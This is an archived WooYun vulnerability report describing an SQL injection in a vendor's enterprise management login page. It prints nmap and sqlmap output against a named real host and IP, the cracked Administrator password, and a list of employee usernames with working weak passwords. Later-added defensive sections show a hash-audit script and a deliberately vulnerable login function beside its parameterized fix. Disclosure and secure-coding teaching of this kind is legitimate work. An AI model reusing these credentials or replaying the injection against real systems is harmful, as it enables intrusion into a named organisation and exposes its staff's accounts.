WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ---------------- http://drop.zone.ci/
2015-12-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-01-23: The vendor has actively ignored the vulnerability; details disclosed to the public.
企智通 Enterprise Server Integrated Management System SQL injection vulnerability: database information and login credentials obtained
1. A network sweep turned up a single live IP address exposing a range of services.
Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-10 14:35 CST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:36
Completed NSE at 14:36, 0.00s elapsed
Initiating NSE at 14:36
Completed NSE at 14:36, 0.00s elapsed
Initiating Ping Scan at 14:36
Scanning 121.14.204.18 [4 ports]
Completed Ping Scan at 14:36, 0.45s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:36
Completed Parallel DNS resolution of 1 host. at 14:36, 0.13s elapsed
Initiating SYN Stealth Scan at 14:36
Scanning 121.14.204.18 [1000 ports]
Discovered open port 23/tcp on 121.14.204.18
Discovered open port 25/tcp on 121.14.204.18
Discovered open port 8080/tcp on 121.14.204.18
Discovered open port 22/tcp on 121.14.204.18
Discovered open port 443/tcp on 121.14.204.18
Discovered open port 80/tcp on 121.14.204.18
Discovered open port 8000/tcp on 121.14.204.18
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 26.87% done; ETC: 14:38 (0:01:13 remaining)
SYN Stealth Scan Timing: About 28.33% done; ETC: 14:39 (0:02:24 remaining)
Increasing send delay for 121.14.204.18 from 0 to 5 due to 11 out of 30 dropped probes since last increase.
SYN Stealth Scan Timing: About 29.77% done; ETC: 14:41 (0:03:25 remaining)
Completed SYN Stealth Scan at 14:38, 102.34s elapsed (1000 total ports)
Initiating Service scan at 14:38
Scanning 7 services on 121.14.204.18
2. Log in using the address and port.
3. Test the login page for SQL injection.
POST https://auth.qzt360.com:443/admin/doCheckLogin.jsp
POST data: strVcName=&strVcPassword=
web application technology: JSP
back-end DBMS operating system: Linux Red Hat
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 8.2.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)'
current user: 'pg'
current schema (equivalent to database on PostgreSQL): 'public'
hostname: None
current user is DBA: True
database management system users [2]:
[*] Administrator
[*] pg
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
database management system users password hashes:
[*] Administrator [1]:
    password hash: md59b78e9569873a28178bc341daea12d93
    clear-text password: 123456
database management system users privileges:
[*] Administrator (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super
[*] pg (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super
database management system users roles:
[*] Administrator (administrator) [3]:
    role: catupd
    role: createdb
    role: super
[*] pg (administrator) [3]:
    role: catupd
    role: createdb
    role: super
Database: pg_catalog
Table: pg_autovacuum
[0 entries]
+----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+
| vacrelid | enabled | vac_cost_limit | freeze_min_age | vac_cost_delay | freeze_max_age | vac_base_thresh | anl_base_thresh | vac_scale_factor | anl_scale_factor |
+----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+
+----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+
sqlmap got a 302 redirect to 'https://auth.qzt360.com/admin/welcome.jsp'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location?
[y/N] Ny
Database: pg_catalog
Table: pg_language
[0 entries]
+-----------------------+-----------------------+---------+
| lanacl | lanispl | lanname |
+-----------------------+-----------------------+---------+
+-----------------------+-----------------------+---------+
0 302 false false 544 baseline request
127 panyj 123123 302 false false 544
386 panyj 123123 302 false false 544
453 panyj 123123 302 false false 544
969 lixinr 123123 302 false false 544
1114 dingyj 123123 302 false false 544
1192 dingyj 123123 302 false false 544
1295 yaol 123123 302 false false 544
1673 zhangn 123123 302 false false 544
1899 huangzx 123123 302 false false 544
2017 shenzy 123123 302 false false 544
2027 shenzy 123123 302 false false 544
2036 shenzy 123123 302 false false 544
2045 shenzy 123123 302 false false 544
3026 fengk 123456 302 false false 544
3659 yanghp 123456 302 false false 544
3758 chensx 123456 302 false false 544
3802 chensx 123456 302 false false 544
3813 mazj 123456 302 false false 544
3993 sunz 123456 302 false false 544
4161 zhangwh 123456 302 false false 544
4183 zhangwh 123456 302 false false 544
4277 yubin 123456 302 false false 544
4291 yubin 123456 302 false false 544
4323 yubin 123456 302 false false 544
4428 chenxf 123456 302 false false 544
4522 huoyq 123456 302 false false 544
4526 huoyq 123456 302 false false 544
4528 huoyq 123456 302 false false 544
Database: pg_catalog
Table: pg_namespace
[0 entries]
+--------+
| nspacl |
+--------+
+--------+
Database: pg_catalog
Table: pg_authid
[0 entries]
+-------------+
| rolcanlogin |
+-------------+
+-------------+
Database: pg_catalog
Table: pg_description
[918 entries]
+--------+----------+----------+------------------------------------------------------------------------+
| objoid | classoid | objsubid | description |
+--------+----------+----------+------------------------------------------------------------------------+
| 1067 | 1255 | 0 | non-persistent series generator |
| 1068 | 1255 | 0 | non-persistent series generator |
| 1069
| 1255 | 0 | non-persistent series generator || 1078 | 1255 | 0 | less-equal-greater || 1079 | 1255 | 0 | convert text to regclass || 1080 | 1255 | 0 | hash || 1081 | 1255 | 0 | format a type oid and atttypmod to canonical SQL || 1082 | 1247 | 0 | ANSI SQL date || 1083 | 1247 | 0 | hh:mm:ss, ANSI SQL time || 1084 | 1255 | 0 | I/O || 1085 | 1255 | 0 | I/O || 1086 | 1255 | 0 | equal || 1087 | 1255 | 0 | less-than || 1088 | 1255 | 0 | less-than-or-equal || 1089 | 1255 | 0 | greater-than || 1090 | 1255 | 0 | greater-than-or-equal || 1091 | 1255 | 0 | not equal || 1092 | 1255 | 0 | less-equal-greater || 1102 | 1255 | 0 | less-than || 1103 | 1255 | 0 | less-than-or-equal || 1104 | 1255 | 0 | greater-than || 1105 | 1255 | 0 | greater-than-or-equal || 1106 | 1255 | 0 | not equal || 1107 | 1255 | 0 | less-equal-greater || 1114 | 1247 | 0 | date and time || 1138 | 1255 | 0 | larger of two || 1139 | 1255 | 0 | smaller of two || 1140 | 1255 | 0 | subtract || 1141 | 1255 | 0 | add || 1142 | 1255 | 0 | subtract || 1143 | 1255 | 0 | I/O || 1144 | 1255 | 0 | I/O || 1145 | 1255 | 0 | equal || 1146 | 1255 | 0 | add || 1147 | 1255 | 0 | subtract || 1148 | 1255 | 0 | multiply || 1149 | 1255 | 0 | divide || 1150 | 1255 | 0 | I/O || 1151 | 1255 | 0 | I/O || 1152 | 1255 | 0 | equal || 1153 | 1255 | 0 | not equal || 1154 | 1255 | 0 | less-than || 1155 | 1255 | 0 | less-than-or-equal || 1156 | 1255 | 0 | greater-than-or-equal || 1157 | 1255 | 0 | greater-than || 1158 | 1255 | 0 | convert UNIX epoch to timestamptz || 1159 | 1255 | 0 | adjust timestamp to new time zone || 1160 | 1255 | 0 | I/O || 1161 | 1255 | 0 | I/O || 1162 | 1255 | 0 | equal || 1163 | 1255 | 0 | not equal || 1164 | 1255 | 0 | less-than || 1165 | 1255 | 0 | less-than-or-equal || 1166 | 1255 | 0 | greater-than-or-equal || 1167 | 1255 | 0 | greater-than || 1168 | 1255 | 0 | subtract || 1169 | 1255 | 0 | add || 1170 | 1255 | 0 | subtract || 1171 | 1255 | 0 | extract field from timestamp with time zone || 1172 | 1255 | 0 | 
extract field from interval || 1173 | 1255 | 0 | convert abstime to timestamp with time zone || 1174 | 1255 | 0 | convert date to timestamp with time zone || 1175 | 1255 | 0 | promote groups of 24 hours to numbers of days || 1176 | 1255 | 0 | convert date and time to timestamp with time zone || 1177 | 1255 | 0 | convert reltime to interval || 1178 | 1255 | 0 | convert timestamp with time zone to date || 1179 | 1255 | 0 | convert abstime to date || 1180 | 1255 | 0 | convert timestamp with time zone to abstime || 1181 | 1255 | 0 | age of a transaction ID, in transactions before current transaction || 1184 | 1247 | 0 | date and time with time zone || 1186 | 1247 | 0 | @ <number> <units>, time interval || 1188 | 1255 | 0 | subtract || 1189 | 1255 | 0 | plus || 1190 | 1255 | 0 | minus || 1191 | 1255 | 0 | convert text to timestamp with time zone || 1192 | 1255 | 0 | convert timestamp with time zone to text || 1193 | 1255 | 0 | convert interval to text || 1194 | 1255 | 0 | convert interval to reltime || 1195 | 1255 | 0 | smaller of two || 1196 | 1255 | 0 | larger of two || 1197 | 1255 | 0 | smaller of two || 1198 | 1255 | 0 | larger of two || 1199 | 1255 | 0 | date difference preserving months and years || 1200 | 1255 | 0 | adjust interval precision || 1215 | 1255 | 0 | get description for object id and catalog name || 1216 | 1255 | 0 | get description for table column || 1217 | 1255 | 0 | truncate timestamp with time zone to specified units || 1218 | 1255 | 0 | truncate interval to specified units || 1219 | 1255 | 0 | increment || 1230 | 1255 | 0 | absolute value || 1236 | 1255 | 0 | larger of two || 1237 | 1255 | 0 | smaller of two || 1238 | 1255 | 0 | matches regex., case-insensitive || 1239 | 1255 | 0 | does not match regex., case-insensitive || 1240 | 1255 | 0 | matches regex., case-insensitive || 1241 | 1255 | 0 | does not match regex., case-insensitive || 1242 | 1255 | 0 | I/O || 1243 | 1255 | 0 | I/O || 1244 | 1255 | 0 | I/O || 1245 | 1255 | 0 | I/O || 1246 | 
1255 | 0 | less-than || 1251 | 1255 | 0 | absolute value || 1252 | 1255 | 0 | does not match regex., case-sensitive || 1253 | 1255 | 0 | absolute value || 1254 | 1255 | 0 | matches regex., case-sensitive || 1256 | 1255 | 0 | does not match regex., case-sensitive || 1257 | 1255 | 0 | length || 1258 | 1255 | 0 | concatenate || 1263 | 1255 | 0 | convert text to interval || 1264 | 1255 | 0 | convert encoding name to encoding id || 1265 | 1255 | 0 | not equal || 1266 | 1247 | 0 | hh:mm:ss, ANSI SQL time || 1267 | 1255 | 0 | I/O || 1268 | 1255 | 0 | btree(internal) || 1269 | 1255 | 0 | bytes required to store the value, perhaps with compression || 1271 | 1255 | 0 | SQL92 interval comparison || 1272 | 1255 | 0 | convert date and time to timestamp || 1273 | 1255 | 0 | extract field from time with time zone || 1274 | 1255 | 0 | add || 1275 | 1255 | 0 | subtract || 1276 | 1255 | 0 | multiply || 1277 | 1255 | 0 | divide || 1278 | 1255 | 0 | add || 1279 | 1255 | 0 | subtract || 1280 | 1255 | 0 | multiply || 1281 | 1255 | 0 | divide || 1282 | 1255 | 0 | quote an identifier for usage in a querystring || 1283 | 1255 | 0 | quote a literal for usage in a querystring || 1285 | 1255 | 0 | not in || 1286 | 1255 | 0 | not in || 1287 | 1255 | 0 | convert int8 to oid || 1288 | 1255 | 0 | convert oid to int8 || 1289 | 1255 | 0 | convert int8 to text || 1290 | 1255 | 0 | convert text to int8 || 1291 | 1255 | 0 | adjust any array to new element typmod || 1292 | 1255 | 0 | equal || 1293 | 1255 | 0 | latest tid of a tuple || 1294 | 1255 | 0 | latest tid of a tuple || 1295 | 1255 | 0 | promote groups of 30 days to numbers of months || 1296 | 1255 | 0 | convert time and date to timestamp || 1297 | 1255 | 0 | convert date and time with time zone to timestamp with time zone || 1298 | 1255 | 0 | convert time with time zone and date to timestamp with time zone || 1299 | 1255 | 0 | current transaction time || 1300 | 1255 | 0 | restriction selectivity for position-comparison operators || 1301 | 1255 
| 0 | join selectivity for position-comparison operators || 1302 | 1255 | 0 | restriction selectivity for containment comparison operators || 1303 | 1255 | 0 | join selectivity for containment comparison operators || 1304 | 1255 | 0 | SQL92 interval comparison || 1305 | 1255 | 0 | SQL92 interval comparison || 1306 | 1255 | 0 | SQL92 interval comparison || 1307 | 1255 | 0 | SQL92 interval comparison || 1308 | 1255 | 0 | SQL92 interval comparison || 1309 | 1255 | 0 | SQL92 interval comparison || 1310 | 1255 | 0 | SQL92 interval comparison || 1311 | 1255 | 0 | SQL92 interval comparison || 1312 | 1255 | 0 | I/O || 1313 | 1255 | 0 | I/O || 1314 | 1255 | 0 | less-equal-greater || 1315 | 1255 | 0 | less-equal-greater || 1316 | 1255 | 0 | convert timestamp to time || 1317 | 1255 | 0 | length || 1318 | 1255 | 0 | character length || 1319 | 1255 | 0 | equal || 1326 | 1255 | 0 | divide || 1339 | 1255 | 0 | base 10 logarithm || 1340 | 1255 | 0 | base 10 logarithm || 1341 | 1255 | 0 | natural logarithm || 1342 | 1255 | 0 | round to nearest integer || 1343 | 1255 | 0 | truncate to integer || 1344 | 1255 | 0 | square root || 1345 | 1255 | 0 | cube root || 1346 | 1255 | 0 | exponentiation || 1347 | 1255 | 0 | exponential || 1348 | 1255 | 0 | get description for object id (deprecated) || 1349 | 1255 | 0 | print type names of oidvector field || 1350 | 1255 | 0 | I/O || 1351 | 1255 | 0 | I/O || 1352 | 1255 | 0 | equal || 1353 | 1255 | 0 | not equal || 1354 | 1255 | 0 | less-than || 1355 | 1255 | 0 | less-than-or-equal || 1356 | 1255 | 0 | greater-than-or-equal || 1357 | 1255 | 0 | greater-than || 1358 | 1255 | 0 | less-equal-greater || 1359 | 1255 | 0 | convert date and time with time zone to timestamp with time zone || 1362 | 1255 | 0 | hostmask of address || 1364 | 1255 | 0 | convert abstime to time || 1365 | 1255 | 0 | make ACL item || 1367 | 1255 | 0 | character length || 1368 | 1255 | 0 | exponentiation || 1369 | 1255 | 0 | character length || 1370 | 1255 | 0 | convert time to 
interval || 1371 | 1255 | 0 | view system lock information || 1372 | 1255 | 0 | character length || 1373 | 1255 | 0 | coerce array to another type and adjust element typmod || 1374 | 1255 | 0 | octet length || 1375 | 1255 | 0 | octet length || 1376 | 1255 | 0 | factorial || 1377 | 1255 | 0 | larger of two || 1378 | 1255 | 0 | smaller of two || 1379 | 1255 | 0 | larger of two || 1380 | 1255 | 0 | smaller of two || 1381 | 1255 | 0 | character length || 1382 | 1255 | 0 | extract field from abstime || 1383 | 1255 | 0 | extract field from reltime || 1384 | 1255 | 0 | extract field from date || 1385 | 1255 | 0 | extract field from time || 1386 | 1255 | 0 | date difference from today preserving months and years || 1387 | 1255 | 0 | constraint description || 1388 | 1255 | 0 | convert timestamptz to timetz || 1389 | 1255 | 0 | finite timestamp? || 1390 | 1255 | 0 | finite interval? || 1391 | 1255 | 0 | Statistics: Start time for current backend session || 1392 | 1255 | 0 | Statistics: Address of client connected to backend || 1393 | 1255 | 0 | Statistics: Port number of client connected to backend || 1394 | 1255 | 0 | absolute value || 1395 | 1255 | 0 | absolute value || 1396 | 1255 | 0 | absolute value || 1397 | 1255 | 0 | absolute value || 1398 | 1255 | 0 | absolute value || 1400 | 1255 | 0 | convert varchar to name || 1401 | 1255 | 0 | convert name to varchar || 1402 | 1255 | 0 | current schema name || 1403 | 1255 | 0 | current schema search list || 1404 | 1255 | 0 | substitute portion of string || 1405 | 1255 | 0 | substitute portion of string || 1406 | 1255 | 0 | vertically aligned? || 1407 | 1255 | 0 | horizontally aligned? || 1408 | 1255 | 0 | parallel? || 1409 | 1255 | 0 | perpendicular? || 1410 | 1255 | 0 | vertical? || 1411 | 1255 | 0 | horizontal? || 1412 | 1255 | 0 | parallel? || 1413 | 1255 | 0 | perpendicular? || 1414 | 1255 | 0 | vertical? || 1415 | 1255 | 0 | horizontal? 
|| 1416 | 1255 | 0 | center of || 1417 | 1255 | 0 | bool is not true (ie, false or unknown) || 1418 | 1255 | 0 | bool is not false (ie, true or unknown) || 1419 | 1255 | 0 | convert interval to time || 1421 | 1255 | 0 | convert points to box || 1422 | 1255 | 0 | add point to box (translate) || 1423 | 1255 | 0 | subtract point from box (translate) || 1424 | 1255 | 0 | multiply box by point (scale) || 1425 | 1255 | 0 | divide box by point (scale) || 1426 | 1255 | 0 | path contains point? || 1427 | 1255 | 0 | I/O || 1428 | 1255 | 0 | polygon contains point? || 1429 | 1255 | 0 | point contained in polygon? || 1430 | 1255 | 0 | path closed? || 1431 | 1255 | 0 | path open? || 1432 | 1255 | 0 | number of points in path || 1433 | 1255 | 0 | close path || 1434 | 1255 | 0 | open path || 1435 | 1255 | 0 | concatenate open paths || 1436 | 1255 | 0 | add (translate path) |+--------+----------+----------+------------------------------------------------------------------------+
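The sqlmap run above recovered the Administrator role's password from its stored hash with a plain dictionary. The following Python is an added example, not part of the original report or of the vendor's product, showing why that is cheap and how a database owner can audit for it: PostgreSQL's md5 password scheme (the one a PostgreSQL 8.2.5 server uses) stores "md5" followed by the hex MD5 of password concatenated with role name, so the role name is the only "salt" and a short wordlist per role is enough. The role names, hashes and the wordlist in the sample are constructed for the example.

```python
"""Audit PostgreSQL md5-scheme role passwords against a weak-password list.

Added example, not part of the original report. The md5 scheme stores
"md5" + hex(md5(password + rolename)): no random salt, only the role name,
so a small dictionary run per role recovers common passwords.
"""
import hashlib

# Assumed wordlist for the example; a real audit uses a proper list.
WEAK_PASSWORDS = ["123456", "123123", "password", "postgres", "admin", ""]


def pg_md5_hash(password: str, rolename: str) -> str:
    """Reproduce PostgreSQL's md5 role password encoding."""
    digest = hashlib.md5((password + rolename).encode("utf-8")).hexdigest()
    return "md5" + digest


def verify_pg_md5(stored: str, password: str, rolename: str) -> bool:
    """True if the candidate password reproduces the stored md5-scheme hash."""
    return stored == pg_md5_hash(password, rolename)


def audit_roles(roles: dict, wordlist=WEAK_PASSWORDS) -> dict:
    """Return {rolename: weak_password} for every role whose stored hash is
    reproduced by a wordlist entry. Entries that are not md5-scheme hashes
    (SCRAM on newer servers, or no password at all) are skipped."""
    findings = {}
    for rolename, stored in roles.items():
        if not isinstance(stored, str) or not stored.startswith("md5") or len(stored) != 35:
            continue
        for candidate in wordlist:
            if verify_pg_md5(stored, candidate, rolename):
                findings[rolename] = candidate
                break
    return findings


if __name__ == "__main__":
    # Constructed sample: one role with the weak password from the report,
    # one with a strong password, one already on SCRAM.
    sample = {
        "Administrator": pg_md5_hash("123456", "Administrator"),
        "app_ro": pg_md5_hash("Vw8$tq2-Lm9!zr", "app_ro"),
        "scram_user": "SCRAM-SHA-256$4096:placeholder$placeholder:placeholder",
    }
    for role, weak in audit_roles(sample).items():
        print(f"role {role!r} uses weak password {weak!r}")
```

Against a live server, a superuser can read `rolname` and `rolpassword` from `pg_authid` (`SELECT rolname, rolpassword FROM pg_authid WHERE rolpassword IS NOT NULL`) and pass the result to `audit_roles`; any hit means rotating that role's password, and where the server version allows it, moving password encryption off the md5 scheme.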
Fix the injection vulnerability; in particular, why is the weak password 123456 there at all?
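To make the fix concrete, the following Python is an added example and not the vendor's code (the report does not show the JSP behind doCheckLogin.jsp): a login check built by string concatenation, the usual cause of an injectable strVcName/strVcPassword pair, beside the parameterized form that closes the hole. SQLite stands in for PostgreSQL and the accounts are constructed; with psycopg2 against PostgreSQL the fixed query has the same shape with %s placeholders.

```python
"""Vulnerable string-built login query beside its parameterized fix.

Added example, not the product's code. SQLite stands in for PostgreSQL;
with psycopg2 the fixed query keeps the same shape using %s placeholders.
"""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Create an in-memory users table with constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT)")
    # Constructed accounts; the weak Administrator password mirrors the report.
    # Plain-text storage is kept only to keep the injection demonstration short;
    # a real system stores a salted password hash instead.
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("Administrator", "123456"), ("alice", "Xk7#vP2q-long")],
    )
    return conn


def check_login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Deliberately vulnerable: user input is spliced into the SQL text, so a
    quote in either field changes the structure of the query."""
    sql = (
        "SELECT COUNT(*) FROM users WHERE name = '" + name
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def check_login_fixed(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Fixed: the SQL text is constant and the values travel as bound
    parameters, so input is only ever compared as data."""
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = setup_db()
    tautology = "' OR '1'='1"  # textbook probe of the class sqlmap automates
    print("vulnerable, valid creds :", check_login_vulnerable(db, "Administrator", "123456"))
    print("vulnerable, tautology   :", check_login_vulnerable(db, tautology, tautology))
    print("fixed, valid creds      :", check_login_fixed(db, "Administrator", "123456"))
    print("fixed, tautology        :", check_login_fixed(db, tautology, tautology))
```

The second half of the report's advice stands on its own: parameterization stops the injection, but the Administrator role still needs a password that no dictionary run will find, and the server should not be reachable on the open internet with seven services exposed.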
Unable to reach the vendor, or the vendor actively refused.